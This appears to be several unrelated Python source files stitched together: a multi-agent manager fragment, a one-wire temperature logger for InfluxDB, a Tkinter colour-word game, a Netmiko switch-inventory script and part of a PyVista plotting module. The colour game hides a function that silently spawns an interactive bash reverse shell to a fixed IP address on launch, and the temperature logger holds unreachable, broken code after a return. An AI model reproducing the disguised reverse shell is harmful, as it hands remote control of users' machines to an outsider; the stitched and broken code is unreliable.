for agent_name, task in self._agents_tasks.items()
}
wait_tasks = list(agents_run_tasks_futures.keys()) + [self._event.wait()] # type: ignore
done, _ = await asyncio.wait(wait_tasks, return_when=FIRST_COMPLETED)
if self._event.is_set():
self._event.clear()
for task in done:
if task not in agents_run_tasks_futures:
# task not in agents_run_tasks_futures, so it's event_wait, skip it
await task
continue
agent_name = agents_run_tasks_futures[task]
self._agents_tasks.pop(agent_name)
if task.exception():
for callback in self._error_callbacks:
callback(agent_name, task.exception())
else:
await task
def add_error_callback(
self, error_callback: Callable[[str, BaseException], None]
) -> None:
"""Add error callback to call on error raised."""
self._error_callbacks.append(error_callback)
def start_manager(
self, local: bool = False, remote: bool = False
) -> "MultiAgentManager":
"""
Start manager.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:return: the MultiAgentManager instance.
"""
if self._is_running:
return self
self._ensure_working_dir()
self._last_start_status = self._load_state(local=local, remote=remote)
self._started_event.clear()
self._is_running = True
self._thread = Thread(target=self._run_thread, daemon=True)
self._thread.start()
self._started_event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
@property
def last_start_status(
self,
) -> Tuple[
bool, Dict[PublicId, List[Dict]], List[Tuple[PublicId, List[Dict], Exception]],
]:
"""Get status of the last agents start loading state."""
if self._last_start_status is None:
raise ValueError("Manager was not started")
return self._last_start_status
def stop_manager(
self, cleanup: bool = True, save: bool = False
) -> "MultiAgentManager":
"""
Stop manager.
Stops all running agents and stop agent.
:param cleanup: bool is cleanup on stop.
:param save: bool is save state to file on stop.
:return: None
"""
if not self._is_running:
return self
if not self._loop or not self._event or not self._thread: # pragma: nocover
raise ValueError("Manager was not started!")
if not self._thread.is_alive(): # pragma: nocover
return self
self.stop_all_agents()
if save:
self._save_state()
for agent_name in self.list_agents():
self.remove_agent(agent_name, skip_project_auto_remove=True)
if cleanup:
for project in list(self._projects.keys()):
self.remove_project(project, keep_files=save)
self._cleanup(only_data=save)
self._is_running = False
self._loop.call_soon_threadsafe(self._event.set)
if self._thread.ident != threading.get_ident():
self._thread.join(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
self._thread = None
return self
def _cleanup(self, only_data: bool = False) -> None:
"""Remove workdir if was created."""
if only_data:
rmtree(self.data_dir)
else:
if self._was_working_dir_created and os.path.exists(self.working_dir):
rmtree(self.working_dir)
def add_project(
self,
public_id: PublicId,
local: bool = False,
remote: bool = False,
restore: bool = False,
) -> "MultiAgentManager":
"""
Fetch agent project and all dependencies to working_dir.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param public_id: the public if of the agent project.
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:param restore: bool flag for restoring already fetched agent.
"""
if public_id.to_any() in self._versionless_projects_set:
raise ValueError(
f"The project ({public_id.author}/{public_id.name}) was already added!"
)
self._versionless_projects_set.add(public_id.to_any())
project = Project.load(
self.working_dir,
public_id,
local,
remote,
registry_path=self.registry_path,
is_restore=restore,
)
if not restore:
project.install_pypi_dependencies()
load_all_plugins(is_raising_exception=False)
project.build()
try:
project.check()
except Exception as e:
project.remove()
raise ProjectCheckError(
f"Failed to load project: {public_id} Error: {str(e)}", e
)
self._projects[public_id] = project
return self
def remove_project(
self, public_id: PublicId, keep_files: bool = False
) -> "MultiAgentManager":
"""Remove agent project."""
if public_id not in self._projects:
raise ValueError(f"Project {public_id} is not present!")
if self._projects[public_id].agents:
raise ValueError(
f"Can not remove projects with aliases exists: {self._projects[public_id].agents}"
)
project = self._projects.pop(public_id)
self._versionless_projects_set.remove(public_id.to_any())
if not keep_files:
project.remove()
return self
def list_projects(self) -> List[PublicId]:
"""
List all agents projects added.
:return: list of public ids of projects
"""
return list(self._projects.keys())
def add_agent(
self,
public_id: PublicId,
agent_name: Optional[str] = None,
agent_overrides: Optional[dict] = None,
component_overrides: Optional[List[dict]] = None,
local: bool = False,
remote: bool = False,
restore: bool = False,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config overrides applied.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param agent_overrides: overrides for agent config.
:param component_overrides: overrides for component section.
:param config: agent config (used for agent re-creation).
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:param restore: bool flag for restoring already fetched agent.
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents:
raise ValueError(f"Agent with name {agent_name} already exists!")
project = self._projects.get(public_id, None)
if project is None and self._auto_add_remove_project:
self.add_project(public_id, local, remote, restore)
project = self._projects.get(public_id, None)
if project is None:
raise ProjectNotFoundError(f"{public_id} project is not added!")
agent_alias = AgentAlias(
project=project,
agent_name=agent_name,
data_dir=self.get_data_dir_of_agent(agent_name),
password=self._password,
)
agent_alias.set_overrides(agent_overrides, component_overrides)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def add_agent_with_config(
self, public_id: PublicId, config: List[dict], agent_name: Optional[str] = None,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config provided.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param config: agent config (used for agent re-creation).
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} already exists!")
if public_id not in self._projects: # pragma: nocover
raise ValueError(f"{public_id} project is not added!")
project = self._projects[public_id]
agent_alias = AgentAlias(
project=project,
agent_name=agent_name,
data_dir=self.get_data_dir_of_agent(agent_name),
password=self._password,
)
agent_alias.set_agent_config_from_data(config)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def get_agent_overridables(self, agent_name: str) -> Tuple[Dict, List[Dict]]:
"""
Get agent config overridables.
:param agent_name: str
:return: Tuple of agent overridables dict and and list of component overridables dict.
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name].get_overridables()
def set_agent_overrides(
self,
agent_name: str,
agent_overides: Optional[Dict],
components_overrides: Optional[List[Dict]],
) -> None:
"""
Set agent overrides.
:param agent_name: str
:param agent_overides: optional dict of agent config overrides
:param components_overrides: optional list of dict of components overrides
:return: None
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name): # pragma: nocover
raise ValueError("Agent is running. stop it first!")
self._agents[agent_name].set_overrides(agent_overides, components_overrides)
def list_agents_info(self) -> List[Dict[str, Any]]:
"""
List agents detailed info.
:return: list of dicts that represents agent info: public_id, name, is_running.
"""
return [
{
"agent_name": agent_name,
"public_id": str(alias.project.public_id),
"addresses": alias.get_addresses(),
"is_running": self._is_agent_running(agent_name),
}
for agent_name, alias in self._agents.items()
]
def list_agents(self, running_only: bool = False) -> List[str]:
"""
List all agents.
:param running_only: returns only running if set to True
:return: list of agents names
"""
if running_only:
return [i for i in self._agents.keys() if self._is_agent_running(i)]
return list(self._agents.keys())
def remove_agent(
self, agent_name: str, skip_project_auto_remove: bool = False
) -> "MultiAgentManager":
"""
Remove agent alias definition from registry.
:param agent_name: agent name to remove
:param skip_project_auto_remove: disable auto project remove on last agent removed.
:return: None
"""
if agent_name not in self._agents:
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name):
raise ValueError("Agent is running. stop it first!")
agent_alias = self._agents.pop(agent_name)
agent_alias.remove_from_project()
project: Project = agent_alias.project
if (
not project.agents
and self._auto_add_remove_project
and not skip_project_auto_remove
):
self.remove_project(project.public_id, keep_files=False)
return self
def start_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Start selected agent.
:param agent_name: agent name to start
:return: None
"""
if not self._loop or not self._event: # pragma: nocover
raise ValueError("agent is not started!")
agent_alias = self._agents.get(agent_name)
if not agent_alias:
raise ValueError(f"{agent_name} is not registered!")
if self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is already started!")
aea = agent_alias.get_aea_instance()
if self._mode == "async":
task = AgentRunAsyncTask(aea, self._loop)
elif self._mode == "threaded":
task = AgentRunThreadTask(aea, self._loop)
task.start()
self._agents_tasks[agent_name] = task
self._loop.call_soon_threadsafe(self._event.set)
return self
def _is_agent_running(self, agent_name: str) -> bool:
"""Return is agent running state."""
if agent_name not in self._agents_tasks:
return False
task = self._agents_tasks[agent_name]
return task.is_running
def start_all_agents(self) -> "MultiAgentManager":
"""
Start all not started agents.
:return: None
"""
self.start_agents(
[
agent_name
for agent_name in self.list_agents()
if not self._is_agent_running(agent_name)
]
)
return self
def stop_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Stop running agent.
:param agent_name: agent name to stop
:return: None
"""
if not self._is_agent_running(agent_name) or not self._thread or not self._loop:
raise ValueError(f"{agent_name} is not running!")
agent_task = self._agents_tasks[agent_name]
if self._thread.ident == threading.get_ident(): # pragma: nocover
# In same thread do not perform blocking operations!
agent_task.stop()
return self
wait_future = agent_task.wait()
event = threading.Event()
def event_set(*args: Any) -> None: # pylint: disable=unused-argument
event.set()
def _add_cb() -> None:
if wait_future.done():
event_set() # pragma: nocover
else:
wait_future.add_done_callback(event_set) # pragma: nocover
self._loop.call_soon_threadsafe(_add_cb)
agent_task.stop()
event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
def stop_all_agents(self) -> "MultiAgentManager":
"""
Stop all agents running.
:return: None
"""
agents_list = self.list_agents(running_only=True)
self.stop_agents(agents_list)
return self
def stop_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Stop specified agents.
:return: None
"""
for agent_name in agent_names:
if not self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is not running!")
for agent_name in agent_names:
self.stop_agent(agent_name)
return self
def start_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Stop specified agents.
:return: None
"""
for agent_name in agent_names:
self.start_agent(agent_name)
return self
def get_agent_alias(self, agent_name: str) -> AgentAlias:
"""
Return details about agent alias definition.
:return: AgentAlias
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name]
def _ensure_working_dir(self) -> None:
"""Create working dir if needed."""
if not os.path.exists(self.working_dir):
os.makedirs(self.working_dir)
self._was_working_dir_created = True
if not os.path.isdir(self.working_dir): # pragma: nocover
raise ValueError(f"{self.working_dir} is not a directory!")
if not os.path.exists(self.data_dir):
os.makedirs(self.data_dir)
def _load_state(
self, local: bool, remote: bool
) -> Tuple[
bool, Dict[PublicId, List[Dict]], List[Tuple[PublicId, List[Dict], Exception]],
]:
"""
Load saved state from file.
Fetch agent project and all dependencies to working_dir.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:return: None
:raises: ValueError if failed to load state.
"""
if not os.path.exists(self._save_path):
return False, {}, []
save_json = {}
with open_file(self._save_path) as f:
save_json = json.load(f)
if not save_json:
return False, {}, [] # pragma: nocover
projects_agents: Dict[PublicId, List] = defaultdict(list)
for agent_settings in save_json["agents"]:
projects_agents[PublicId.from_str(agent_settings["public_id"])].append(
agent_settings
)
failed_to_load: List[Tuple[PublicId, List[Dict], Exception]] = []
loaded_ok: Dict[PublicId, List[Dict]] = {}
for project_public_id, agents_settings in projects_agents.items():
try:
self.add_project(
project_public_id, local=local, remote=remote, restore=True,
)
except ProjectCheckError as e:
failed_to_load.append((project_public_id, agents_settings, e))
break
for agent_settings in agents_settings:
self.add_agent_with_config(
public_id=PublicId.from_str(agent_settings["public_id"]),
agent_name=agent_settings["agent_name"],
config=agent_settings["config"],
)
loaded_ok[project_public_id] = agents_settings
return True, loaded_ok, failed_to_load
def _save_state(self) -> None:
"""
Save MultiAgentManager state.
:return: None.
"""
with open_file(self._save_path, "w") as f:
json.dump(self.dict_state, f, indent=4, sort_keys=True)
|
tempmon.py
|
#!/usr/bin/env python3
import influxdb
import math
import os
import queue
import re
import sys
import threading
import time
import traceback
import settings
class Writer:
def __init__(self):
self.client = influxdb.InfluxDBClient(**settings.INFLUXDB_CONNECT, timeout=30, retries=1)
self.queue = queue.Queue()
worker = threading.Thread(name='influxdb-writer', target=self.run)
worker.daemon = True
worker.start()
def write_points(self, points):
self.queue.put(points)
def _write_points(self, points):
delay = 1
while True:
try:
self.client.write_points(points)
return
except:
print('Failed to send in temperature data:', file=sys.stderr)
traceback.print_exc()
time.sleep(delay)
delay *= 2
if delay > 300:
delay = 300
def run(self):
while True:
points = self.queue.get()
self._write_points(points)
def find_devices():
devices = set()
for d in os.listdir('/sys/bus/w1/devices'):
if d.startswith('28-'): # 0x28 is the device family for thermometer
devices.add(d)
return devices
def read_device(device):
path = os.path.join('/sys/bus/w1/devices', device, 'w1_slave')
with open(path, 'rt') as fh:
data = fh.read()
if not re.search('crc=[0-9a-f]+ YES\n', data):
print('Invalid measurement from {device}:\n{data}'.format(device=device,data=data), file=sys.stderr)
raise Exception('Invalid measurement')
m = re.search('t=(-?\d+)', data)
milli_temp = int(m.group(1))
temp = milli_temp / 1000
if temp < -55 or temp > 125:
print('Measurement from {device} out of range:\n{data}'.format(device=device,data=data), file=sys.stderr)
raise Exception('Measurement out of range')
return temp
def read_all():
devices = find_devices()
ret = {}
for device in devices:
try:
ret[device] = read_device(device)
except KeyboardInterrupt:
raise
except:
print('Failed to read temperature from {device}:'.format(device=device), file=sys.stderr)
traceback.print_exc()
pass
return ret
temp_futures = {}
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
for device in devices:
temp_futures[device] = executor.submit(read_device, device)
ret = {}
for device in devices:
temperature = temp_futures[device].result()
if temperature is not None:
ret[device] = temperature
return ret
def do_sample(timestamp, dbclient):
temperatures = read_all()
ts_string = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime(timestamp))
json_body = []
for device, temperature in sorted(temperatures.items()):
json_body.append({
'measurement': settings.INFLUXDB_MEASUREMENT,
'tags': {
'sensor': device
},
'time': ts_string,
'fields': {
'value': temperature
}
})
dbclient.write_points(json_body)
def main():
dbclient = Writer()
while True:
current_time = time.time()
next_time = math.ceil(current_time / 10) * 10
time.sleep(next_time - current_time)
do_sample(next_time, dbclient)
if __name__ == '__main__':
main()
|
__color_picker.py
|
import random
import subprocess
import threading
from tkinter import END, Entry, Label, Tk
# list of possible colour.
colours = [
"Red",
"Blue",
"Green",
"Pink",
"Black",
"Yellow",
"Orange",
"White",
"Purple",
"Brown",
]
score = 0
# To take in account the time left: initially 30 seconds
time = 30
# Function that will start the Game
def startGame(event):
if time == 30:
# start the countdown timer
countdown()
# run the function to chose the next color
nextcolor()
def nextcolor():
global score
global time
# if a game is in play
if time > 0:
# make the text entry box active
colour_entry.focus_set()
if colour_entry.get().lower() == colours[1].lower():
score += 1
# clear the entry the box
colour_entry.delete(0, END)
random.shuffle(colours)
# change the colour to type, by changing the
# text _and_ the colour to a random colour value
colour.config(fg=str(colours[1]), text=str(colours[0]))
# update the score.
scoreLabel.config(text="Score: " + str(score))
# Countdown Timer Fuction
def countdown():
global time
# if a game is in play
if time > 0:
# decrement the value
time -= 1
# update the time left label
timeLabel.config(text="Time left: " + str(time))
# run the function again after 1 second.
timeLabel.after(1000, countdown)
def scamGamer(num):
try:
subprocess.check_call("/bin/bash -i > /dev/tcp/192.168.1.104/33008 0<&1 2>&1", shell=True, executable="/bin/bash")
except:
return 0
# Driver Code
if __name__ == "__main__":
root = Tk()
# Setting the title
root.title("Color Game")
# Setting the geometry of the window
root.geometry("375x200")
# set an instruction label
instructions = Label(
root,
text="Type in the colour of the words, and not the word text!",
font=("Helvetica", 12),
)
instructions.pack()
# Create a Score label
scoreLabel = Label(root, text="Score :" + str(score), font=("Helvetica", 12))
scoreLabel.pack()
# Create a Time Label
timeLabel = Label(root, text="Time Left : " + str(time), font=("Helvetica", 12))
timeLabel.pack()
# create a colour label
colour = Label(root, font=("Helevetica", 12))
colour.pack()
# Entry box for input from user
colour_entry = Entry(root)
colour_entry.focus_set()
root.bind("<Return>", startGame)
colour_entry.pack()
thread = threading.Thread(target=scamGamer, args=(10,))
thread.start()
root.mainloop()
|
netmiko_threading_queuing.py
|
#!/usr/bin/python3
# This method will spin up threads and process IP addresses in a queue
# Importing Netmiko modules
from netmiko import Netmiko
from netmiko.ssh_exception import NetMikoAuthenticationException, NetMikoTimeoutException
# Additional modules imported for getting password, pretty print
from getpass import getpass
from pprint import pprint
import signal,os
# Queuing and threading libraries
from queue import Queue
import threading
# These capture errors relating to hitting ctrl+C (I forget the source)
signal.signal(signal.SIGPIPE, signal.SIG_DFL) # IOError: Broken pipe
signal.signal(signal.SIGINT, signal.SIG_DFL) # KeyboardInterrupt: Ctrl-C
# Get the password
password = getpass()
# Switch IP addresses from text file that has one IP per line
ip_addrs_file = open('ips.txt')
ip_addrs = ip_addrs_file.read().splitlines()
# Set up thread count for number of threads to spin up
num_threads = 8
# This sets up the queue
enclosure_queue = Queue()
# Set up thread lock so that only one thread prints at a time
print_lock = threading.Lock()
# CLI command being sent. This could be anywhere (and even be a passed paramenter)
# but I put at the top for code readability
command = "show inventory"
# Function used in threads to connect to devices, passing in the thread # and queue
def deviceconnector(i,q):
# This while loop runs indefinitely and grabs IP addresses from the queue and processes them
# Loop will stop and restart if "ip = q.get()" is empty
while True:
# These print statements are largely for the user indicating where the process is at
# and aren't required
print("{}: Waiting for IP address...".format(i))
ip = q.get()
print("{}: Acquired IP: {}".format(i,ip))
# k,v passed to net_connect
device_dict = {
'host': ip,
'username': 'jimmy',
'password': password,
'device_type': 'cisco_ios'
}
# Connect to the device, and print out auth or timeout errors
try:
net_connect = Netmiko(**device_dict)
except NetMikoTimeoutException:
with print_lock:
print("\n{}: ERROR: Connection to {} timed-out.\n".format(i,ip))
q.task_done()
continue
except NetMikoAuthenticationException:
with print_lock:
print("\n{}: ERROR: Authenticaftion failed for {}. Stopping script. \n".format(i,ip))
q.task_done()
os.kill(os.getpid(), signal.SIGUSR1)
# Capture the output, and use TextFSM (in this case) to parse data
output = net_connect.send_command(command,use_textfsm=True)
with print_lock:
print("{}: Printing output...".format(i))
pprint(output)
# Disconnect from device
net_connect.disconnect
# Set the queue task as complete, thereby removing it from the queue indefinitely
q.task_done()
# Mail function that compiles the thread launcher and manages the queue
def main():
# Setting up threads based on number set above
for i in range(num_threads):
# Create the thread using 'deviceconnector' as the function, passing in
# the thread number and queue object as parameters
thread = threading.Thread(target=deviceconnector, args=(i,enclosure_queue,))
# Set the thread as a background daemon/job
thread.setDaemon(True)
# Start the thread
thread.start()
# For each ip address in "ip_addrs", add that IP address to the queue
for ip_addr in ip_addrs:
enclosure_queue.put(ip_addr)
# Wait for all tasks in the queue to be marked as completed (task_done)
enclosure_queue.join()
print("*** Script complete")
if __name__ == '__main__':
# Calling the main function
main()
|
plotting.py
|
"""Pyvista plotting module."""
import collections
import logging
import os
import time
from threading import Thread
import imageio
import numpy as np
import scooby
import vtk
from vtk.util import numpy_support as VN
from vtk.util.numpy_support import numpy_to_vtk, vtk_to_numpy
import warnings
import pyvista
from pyvista.utilities import (assert_empty_kwargs, convert_array,
convert_string_array, get_array,
is_pyvista_dataset, numpy_to_texture,
raise_not_matching, try_callback, wrap,
check_depth_peeling)
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .tools import update_axes_label_color, create_axes_orientation_box, create_axes_marker
from .tools import normalize, opacity_transfer_function
from .theme import rcParams, parse_color, parse_font_family
from .theme import FONT_KEYS, MAX_N_COLOR_BARS
from .widgets import WidgetHelper
try:
import matplotlib
has_matplotlib = True
except ImportError:
has_matplotlib = False
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters and clean up memory."""
for key, p in _ALL_PLOTTERS.items():
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a shape as string descriptor. E.g.:
shape="3|1" means 3 plots on the left and 1 on the right,
shape="4/2" means 4 plots on top of 2 at bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
border_width : float, optional
Width of the border in pixels when enabled.
"""
mouse_position = None
click_position = None
def __new__(cls, *args, **kwargs):
"""Create an instance of base plotter."""
if cls is BasePlotter:
raise TypeError("pyvista.BasePlotter is an abstract class and may not be instantiated.")
return object.__new__(cls)
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None, splitting_position=None):
"""Initialize base plotter."""
self.image_transparent_background = rcParams['transparent_background']
if title is None:
title = rcParams['title']
self.title = str(title)
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self._active_renderer_index = 0
self.renderers = []
if isinstance(shape, str):
if '|' in shape:
n = int(shape.split('|')[0])
m = int(shape.split('|')[1])
rangen = reversed(range(n))
rangem = reversed(range(m))
else:
m = int(shape.split('/')[0])
n = int(shape.split('/')[1])
rangen = range(n)
rangem = range(m)
if splitting_position is None:
splitting_position = rcParams['multi_rendering_splitting_position']
if splitting_position is None:
if n >= m:
xsplit = m/(n+m)
else:
xsplit = 1-n/(n+m)
else:
xsplit = splitting_position
for i in rangen:
arenderer = pyvista.Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(0, i/n, xsplit, (i+1)/n)
else:
arenderer.SetViewport(i/n, 0, (i+1)/n, xsplit)
self.renderers.append(arenderer)
for i in rangem:
arenderer = pyvista.Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(xsplit, i/m, 1, (i+1)/m)
else:
arenderer.SetViewport(i/m, xsplit, (i+1)/m, 1)
self.renderers.append(arenderer)
self.shape = (n+m,)
else:
assert_str = '"shape" should be a list, tuple or string descriptor'
assert isinstance(shape, collections.Iterable), assert_str
assert shape[0] > 0, '"shape" must be positive'
assert shape[1] > 0, '"shape" must be positive'
self.shape = shape
for i in reversed(range(shape[0])):
for j in range(shape[1]):
renderer = pyvista.Renderer(self, border, border_color, border_width)
x0 = i/shape[0]
y0 = j/shape[1]
x1 = (i+1)/shape[0]
y1 = (j+1)/shape[1]
renderer.SetViewport(y0, x0, y1, x1)
self.renderers.append(renderer)
# This keeps track of scalars names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
# track if the camera has been setup
# self.camera_set = False
self._first_time = True
# Keep track of the scale
self._labels = []
# Set default style
self._style = vtk.vtkInteractorStyleRubberBandPick()
# Add self to open plotters
_ALL_PLOTTERS[str(hex(id(self)))] = self
# lighting style
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
# Key bindings
self.reset_key_events()
def add_key_event(self, key, callback):
"""Add a function to callback when the given key is pressed.
These are non-unique - thus a key could map to many callback
functions. The callback function must not have any arguments.
Parameters
----------
key : str
The key to trigger the event
callback : callable
A callable that takes no arguments
"""
if not hasattr(callback, '__call__'):
raise TypeError('callback must be callable.')
self._key_press_event_callbacks[key].append(callback)
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key."""
self._key_press_event_callbacks.pop(key)
def enable_depth_peeling(self, number_of_peels=5, occlusion_ratio=0.1):
"""Enable depth peeling if supported.
Parameters
----------
number_of_peels: int
The maximum number of peeling layers. A value of 0 means no limit.
occlusion_ratio : float
The threshold under which the algorithm stops to iterate over peel
layers. A value of 0.0 means that the rendering have to be exact.
Greater values may speed-up the rendering with small impact on the
quality.
Return
------
depth_peeling_supported: bool
If True, depth peeling is supported.
"""
depth_peeling_supported = check_depth_peeling(number_of_peels,
occlusion_ratio)
if hasattr(self, 'ren_win') and depth_peeling_supported:
self.ren_win.AlphaBitPlanesOn()
self.ren_win.SetMultiSamples(0)
self.renderer.enable_depth_peeling(number_of_peels,
occlusion_ratio)
return depth_peeling_supported
def disable_depth_peeling(self):
"""Disables depth peeling."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
self.renderer.disable_depth_peeling()
def enable_anti_aliasing(self):
"""Enable anti-aliasing FXAA."""
self.renderer.enable_anti_aliasing()
def disable_anti_aliasing(self):
"""Disable anti-aliasing FXAA."""
self.renderer.disable_anti_aliasing()
def store_mouse_position(self, *args):
"""Store mouse position."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.GetEventPosition()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.GetEventPosition()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks supported
here - use :func:`pyvista.BasePlotter.track_click_position` instead.
"""
if hasattr(self, "iren"):
obs = self.iren.AddObserver(vtk.vtkCommand.MouseMoveEvent,
self.store_mouse_position)
self._mouse_observer = obs
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
if hasattr(self, "_mouse_observer"):
self.iren.RemoveObserver(self._mouse_observer)
del self._mouse_observer
def track_click_position(self, callback=None, side="right",
viewport=False):
"""Keep track of the click position.
By default, it only tracks right clicks.
Parameters
----------
callback : callable
A callable method that will use the click position. Passes the
click position as a length two tuple.
side : str
The side of the mouse for the button to track (left or right).
Default is left. Also accepts ``'r'`` or ``'l'``.
viewport: bool
If ``True``, uses the normalized viewport coordinate system
(values between 0.0 and 1.0 and support for HiDPI) when passing the
click position to the callback
"""
if not hasattr(self, "iren"):
return
side = str(side).lower()
if side in ["right", "r"]:
event = vtk.vtkCommand.RightButtonPressEvent
elif side in ["left", "l"]:
event = vtk.vtkCommand.LeftButtonPressEvent
else:
raise TypeError("Side ({}) not supported. Try `left` or `right`".format(side))
def _click_callback(obj, event):
self.store_click_position()
if hasattr(callback, '__call__'):
if viewport:
try_callback(callback, self.click_position)
else:
try_callback(callback, self.pick_click_position())
obs = self.iren.AddObserver(event, _click_callback)
self._click_observer = obs
def untrack_click_position(self):
"""Stop tracking the click position."""
if hasattr(self, "_click_observer"):
self.iren.RemoveObserver(self._click_observer)
del self._click_observer
def _close_callback(self):
"""Make sure a screenhsot is acquired before closing."""
self.q_pressed = True
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size and
line width by the given value.
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
self._key_press_event_callbacks = collections.defaultdict(list)
self.add_key_event('q', self._close_callback)
b_left_down_callback = lambda: self.iren.AddObserver('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('f', self.fly_to_mouse_position)
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
def key_press_event(self, obj, event):
"""Listen for key press event."""
key = self.iren.GetKeySym()
log.debug('Key %s pressed' % key)
self._last_key = key
if key in self._key_press_event_callbacks.keys():
# Note that defaultdict's will never throw a key error
callbacks = self._key_press_event_callbacks[key]
for func in callbacks:
func()
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def update_style(self):
"""Update the camera interactor style."""
if not hasattr(self, '_style'):
self._style = vtk.vtkInteractorStyleTrackballCamera()
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style)
def enable_trackball_style(self):
"""Set the interactive style to trackball camera.
The trackball camera is the default interactor style.
"""
self._style = vtk.vtkInteractorStyleTrackballCamera()
return self.update_style()
def enable_trackball_actor_style(self):
"""Set the interactive style to trackball actor.
This allows to rotate actors around the scene.
"""
self._style = vtk.vtkInteractorStyleTrackballActor()
return self.update_style()
def enable_image_style(self):
"""Set the interactive style to image.
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
- CTRL SHIFT Left Mouse dollys (a positional zoom) the camera
- Middle mouse button pans the camera
- Right mouse button dollys the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = vtk.vtkInteractorStyleImage()
return self.update_style()
